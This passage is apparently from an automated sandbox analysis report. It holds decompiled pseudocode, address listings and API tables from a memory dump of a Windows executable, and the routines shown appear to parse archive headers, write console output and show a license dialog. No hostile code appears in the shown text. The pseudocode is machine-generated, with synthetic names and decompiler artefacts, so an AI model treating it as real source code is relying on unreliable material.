				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E001FC39E(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E001FC39E(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E001FC39E(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E001FC39E(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E001FC39E(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E001FC39E(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E001FC39E(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E001FC251(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E001F3E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E001F3DEC(_t257, _t240 + 0x28, _t167);
												}
												E001FC300(_t318, _t240 + 0x10a1, 0x10);
												E001FC300(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E001FC300(_t318, _t240 + 0x10c2, 8);
													E001FC300(_t318, _t344 + 0x30, 4);
													E001FF524(_t344 + 0x58);
													E001FF56A(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E001FF435(_t344 + 0x5c);
													_t161 = E0020F3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E0020F3CA(_t325, 0x222398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E001F3E41(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E001F3DEC(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E001FC39E(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E001FC300(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E001FC39E(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00200A64(_t240 + 0x1040, _t315, E001FC2E0(_t278, __eflags), _t315);
													} else {
														E00200A25(_t240 + 0x1040, _t315, E001FC29E(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00200A64(_t240 + 0x1048, _t315, E001FC2E0(_t275, __eflags), _t315);
													} else {
														E00200A25(_t240 + 0x1048, _t315, E001FC29E(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00200A64(_t240 + 0x1050, _t315, E001FC2E0(_t272, __eflags), _t315);
													} else {
														E00200A25(_t240 + 0x1050, _t315, E001FC29E(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E001FC29E(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E002006D0(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E001FC29E(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E002006D0(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E001FC29E(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E002006D0(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E001FC39E(_t315);
												__eflags = E001FC39E(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E001F3E41(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E001FFA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E001FC39E(_t315);
											 *(_t240 + 0x2104) = E001FC39E(_t315) & 0x00000001;
											_t331 = E001FC39E(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E001FC300(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E001FB9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00201094();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E001FC39E(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E001FC39E(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E001FC300(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E001FC39E(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E001FC300(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E001FC39E(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E001FC39E(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E001F1EDE(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}





























































          0x001f2011
          0x001f2017
          0x001f201e
          0x001f2022
          0x001f2027
          0x001f2031
          0x001f2688
          0x001f268f
          0x001f268f
          0x001f2037
          0x001f2039
          0x001f203f
          0x001f2046
          0x001f204f
          0x001f2051
          0x001f2056
          0x001f2058
          0x001f205a
          0x00000000
          0x00000000
          0x001f206d
          0x001f2070
          0x001f2072
          0x00000000
          0x00000000
          0x001f2078
          0x001f207a
          0x00000000
          0x001f208a
          0x001f208a
          0x001f208f
          0x001f2093
          0x001f2098
          0x001f209b
          0x001f209d
          0x001f209f
          0x001f20a1
          0x001f20a5
          0x001f20a9
          0x00000000
          0x001f20b9
          0x001f20bd
          0x001f20ce
          0x001f20d2
          0x001f20d7
          0x001f20dd
          0x001f20e1
          0x001f20ea
          0x001f2102
          0x001f2104
          0x001f2107
          0x001f2107
          0x001f210a
          0x001f210a
          0x001f2110
          0x001f2114
          0x001f211d
          0x001f2135
          0x001f2137
          0x001f213a
          0x001f213a
          0x001f211d
          0x001f213d
          0x001f2141
          0x001f2141
          0x001f2149
          0x001f2155
          0x001f2157
          0x00000000
          0x001f2168
          0x001f2168
          0x001f216b
          0x001f251a
          0x001f251f
          0x001f2521
          0x001f2551
          0x001f255f
          0x001f2567
          0x001f2572
          0x001f2575
          0x001f257b
          0x001f257e
          0x001f258d
          0x001f2592
          0x001f2596
          0x001f259a
          0x001f25a2
          0x001f25a2
          0x001f25b2
          0x001f25c2
          0x001f25c7
          0x001f25ce
          0x001f25d6
          0x001f25df
          0x001f25ed
          0x001f25f7
          0x001f2604
          0x001f260d
          0x001f2613
          0x001f2624
          0x001f2629
          0x001f262e
          0x001f2632
          0x001f2636
          0x001f263c
          0x001f2646
          0x001f264b
          0x001f264e
          0x001f2650
          0x001f2652
          0x001f2652
          0x001f2650
          0x001f263c
          0x001f2658
          0x001f265f
          0x001f2669
          0x001f2523
          0x001f2530
          0x001f2535
          0x001f2539
          0x001f253d
          0x001f2545
          0x001f2545
          0x00000000
          0x001f2521
          0x001f2171
          0x001f2174
          0x001f24f3
          0x001f24f8
          0x001f24fa
          0x00000000
          0x00000000
          0x001f2500
          0x001f2508
          0x001f2512
          0x001f21c9
          0x001f21cb
          0x00000000
          0x001f21cb
          0x001f217a
          0x001f217d
          0x001f2374
          0x001f2376
          0x00000000
          0x00000000
          0x001f237c
          0x001f2387
          0x001f2389
          0x001f238e
          0x001f2392
          0x001f2394
          0x001f239a
          0x001f239e
          0x001f239e
          0x001f23a1
          0x001f23a5
          0x001f23a7
          0x001f23a9
          0x001f23ab
          0x001f23cf
          0x001f23ad
          0x001f23bb
          0x001f23bb
          0x001f23d4
          0x001f23d8
          0x001f23d8
          0x001f23dc
          0x001f23dc
          0x001f23df
          0x001f23e3
          0x001f23e5
          0x001f23e7
          0x001f23e9
          0x001f240d
          0x001f23eb
          0x001f23f9
          0x001f23f9
          0x001f23e9
          0x001f2412
          0x001f2418
          0x001f2418
          0x001f241b
          0x001f241f
          0x001f2421
          0x001f2426
          0x001f2428
          0x001f244c
          0x001f242a
          0x001f2438
          0x001f2438
          0x001f2451
          0x001f2451
          0x001f2455
          0x001f245a
          0x001f2460
          0x001f2462
          0x001f2468
          0x001f246d
          0x001f2496
          0x001f249b
          0x001f246f
          0x001f2471
          0x001f2476
          0x001f247b
          0x001f2480
          0x001f2482
          0x001f2484
          0x001f248f
          0x001f248f
          0x001f2484
          0x001f24a0
          0x001f24a5
          0x001f24ae
          0x001f24b0
          0x001f24b2
          0x001f24bd
          0x001f24bd
          0x001f24b2
          0x001f24c2
          0x001f24c7
          0x001f24d4
          0x001f24d6
          0x001f24d8
          0x001f24e7
          0x001f24e7
          0x001f24d8
          0x001f24c7
          0x001f2462
          0x00000000
          0x001f245a
          0x001f237e
          0x001f2381
          0x00000000
          0x00000000
          0x00000000
          0x001f2381
          0x001f2183
          0x001f2186
          0x001f2317
          0x001f2319
          0x00000000
          0x00000000
          0x001f231f
          0x001f232a
          0x001f232c
          0x001f2338
          0x001f233a
          0x001f234a
          0x001f2354
          0x001f2359
          0x001f236a
          0x001f236a
          0x00000000
          0x001f233a
          0x001f2321
          0x001f2324
          0x00000000
          0x00000000
          0x00000000
          0x001f2324
          0x001f218c
          0x001f218f
          0x001f22a2
          0x001f22b1
          0x001f22bc
          0x001f22be
          0x001f22c6
          0x001f22cc
          0x001f22d9
          0x001f22de
          0x001f22de
          0x001f22f4
          0x001f22f9
          0x001f2304
          0x001f230c
          0x001f230d
          0x00000000
          0x001f230d
          0x001f2195
          0x001f2198
          0x001f21d7
          0x001f21de
          0x001f21e5
          0x001f21ee
          0x001f21fc
          0x001f2202
          0x001f2209
          0x001f220d
          0x001f220f
          0x001f2218
          0x001f221f
          0x001f2221
          0x001f2223
          0x001f2223
          0x001f2229
          0x001f222e
          0x001f2232
          0x001f2232
          0x001f2236
          0x001f2238
          0x001f2241
          0x001f2248
          0x001f224a
          0x001f224c
          0x001f224c
          0x001f224f
          0x001f2258
          0x001f225d
          0x001f225d
          0x001f2261
          0x001f2268
          0x001f2271
          0x001f2271
          0x001f2277
          0x001f227e
          0x001f2287
          0x001f2287
          0x001f228d
          0x00000000
          0x001f228d
          0x001f219d
          0x00000000
          0x00000000
          0x001f21a7
          0x001f21b5
          0x001f21b5
          0x001f21b8
          0x001f21c1
          0x001f21c6
          0x001f21c7
          0x00000000
          0x001f21c7
          0x001f2670
          0x001f2670
          0x001f2670
          0x001f2674
          0x001f267a
          0x001f267f
          0x00000000
          0x00000000
          0x00000000
          0x001f267f
          0x001f2149
          0x001f20a9
          0x001f207a
          0x001f2687

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: ;%u$x%u$xc%u
          • API String ID: 0-2277559157
          • Opcode ID: 4b85fa523e04cbe120e5c20ceaa0ecce9f7d25a0dcfe5e86e8af7eda00b33c79
          • Instruction ID: a7e0a7be31b3f11f3d496fd5987fd8eeb2d6ff8c14af6f3c5739e858a2f5d940
          • Opcode Fuzzy Hash: 4b85fa523e04cbe120e5c20ceaa0ecce9f7d25a0dcfe5e86e8af7eda00b33c79
          • Instruction Fuzzy Hash: 37F1287160434C5BDB14EF248995BFE779AAFA4300F084469FF86CB287DB749848D7A2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021E2ED, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
          Download Yara Rule
          C-Code - Quality: 78%
          			E0021E2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x22d668; // 0x4319796a
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x250420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x250420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00219474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x250420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x250420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x250420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E0021804C( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E0021804C();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x21ea62
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x21ea62
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0020E203(_t135, _v8 ^ _t136);
			}


































          0x0021e2f5
          0x0021e2fc
          0x0021e2ff
          0x0021e307
          0x0021e30b
          0x0021e317
          0x0021e31a
          0x0021e31d
          0x0021e324
          0x0021e32c
          0x0021e32f
          0x0021e335
          0x0021e33b
          0x0021e340
          0x0021e342
          0x0021e345
          0x0021e34a
          0x0021e354
          0x0021e35b
          0x0021e35e
          0x0021e365
          0x0021e36c
          0x0021e398
          0x0021e3be
          0x0021e3c0
          0x00000000
          0x0021e39a
          0x0021e39d
          0x0021e464
          0x0021e470
          0x0021e47b
          0x0021e480
          0x0021e3a3
          0x0021e3aa
          0x0021e3af
          0x0021e3b5
          0x0021e3bb
          0x00000000
          0x0021e3bb
          0x0021e3b5
          0x0021e39d
          0x0021e36e
          0x0021e372
          0x0021e375
          0x0021e37b
          0x0021e37d
          0x0021e380
          0x0021e384
          0x0021e3c1
          0x0021e3c4
          0x0021e3c5
          0x0021e3ca
          0x0021e3d0
          0x0021e3d6
          0x0021e3e5
          0x0021e3eb
          0x0021e3f1
          0x0021e3f6
          0x0021e3fe
          0x0021e412
          0x0021e485
          0x0021e48b
          0x0021e414
          0x0021e414
          0x0021e41c
          0x0021e425
          0x0021e42b
          0x00000000
          0x0021e42d
          0x0021e42f
          0x0021e432
          0x0021e436
          0x0021e44b
          0x00000000
          0x0021e44d
          0x0021e451
          0x0021e453
          0x0021e456
          0x00000000
          0x0021e456
          0x0021e451
          0x0021e44b
          0x0021e42b
          0x0021e425
          0x0021e412
          0x0021e3f6
          0x0021e3d0
          0x00000000
          0x0021e459
          0x0021e459
          0x0021e48d
          0x0021e49f

          APIs
          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0021EA62,00000000,00000000,00000000,00000000,00000000,00213FBF), ref: 0021E32F
          • __fassign.LIBCMT ref: 0021E3AA
          • __fassign.LIBCMT ref: 0021E3C5
          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0021E3EB
          • WriteFile.KERNEL32(?,00000000,00000000,b!,00000000,?,?,?,?,?,?,?,?,?,0021EA62,00000000), ref: 0021E40A
          • WriteFile.KERNEL32(?,00000000,00000001,b!,00000000,?,?,?,?,?,?,?,?,?,0021EA62,00000000), ref: 0021E443
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
          • String ID: b!
          • API String ID: 1324828854-2026699736
          • Opcode ID: 97106806c6f8c0376d8c4b8e403c6552669eef22ab8c07bc19341316004671ab
          • Instruction ID: 288654548f334c60a57273d4b291fe4e9834e88179a9e755fdca7a2efa7cca22
          • Opcode Fuzzy Hash: 97106806c6f8c0376d8c4b8e403c6552669eef22ab8c07bc19341316004671ab
          • Instruction Fuzzy Hash: 8951C770A10249AFCF10CFA8DC85EEEBBF9EF18310F15416AE965E7251D7309991CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020A3E1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
          Download Yara Rule
          C-Code - Quality: 73%
          			E0020A3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E001F12D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E0020C343(__edx, __eflags, __fp0, _t35);
					_t9 =  *0x23b704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0x245d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x24de1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0x22df40(0xf));
					 *0x22df3c(_t35);
					_t31 =  *0x2375ec; // 0x0
					E00208FE6(_t31, __eflags,  *0x230064, _t38,  *0x24de18, 0, 0);
					L00212B4E( *0x24de1c);
					L00212B4E( *0x24de18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}













          0x0020a3e2
          0x0020a3e8
          0x0020a3ef
          0x0020a408
          0x0020a4ee
          0x0020a4f0
          0x00000000
          0x0020a4f0
          0x0020a40e
          0x0020a414
          0x0020a441
          0x0020a446
          0x0020a451
          0x0020a453
          0x0020a45e
          0x0020a45e
          0x0020a460
          0x0020a465
          0x0020a467
          0x0020a473
          0x0020a473
          0x0020a479
          0x0020a47e
          0x0020a480
          0x0020a484
          0x0020a484
          0x0020a499
          0x0020a4a1
          0x0020a4b3
          0x0020a4b6
          0x0020a4bc
          0x0020a4d1
          0x0020a4dc
          0x0020a4e7
          0x00000000
          0x0020a4ed
          0x0020a419
          0x0020a428
          0x00000000
          0x0020a428
          0x0020a41e
          0x0020a421
          0x0020a43c
          0x0020a430
          0x0020a431
          0x00000000
          0x0020a431
          0x0020a426
          0x0020a42f
          0x00000000
          0x0020a42f
          0x00000000

          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 0020A431
          • SendMessageW.USER32(?,00000080,00000001,?), ref: 0020A45E
          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0020A473
          • SetWindowTextW.USER32(?,?), ref: 0020A484
          • GetDlgItem.USER32(?,00000065), ref: 0020A48D
          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0020A4A1
          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0020A4B3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
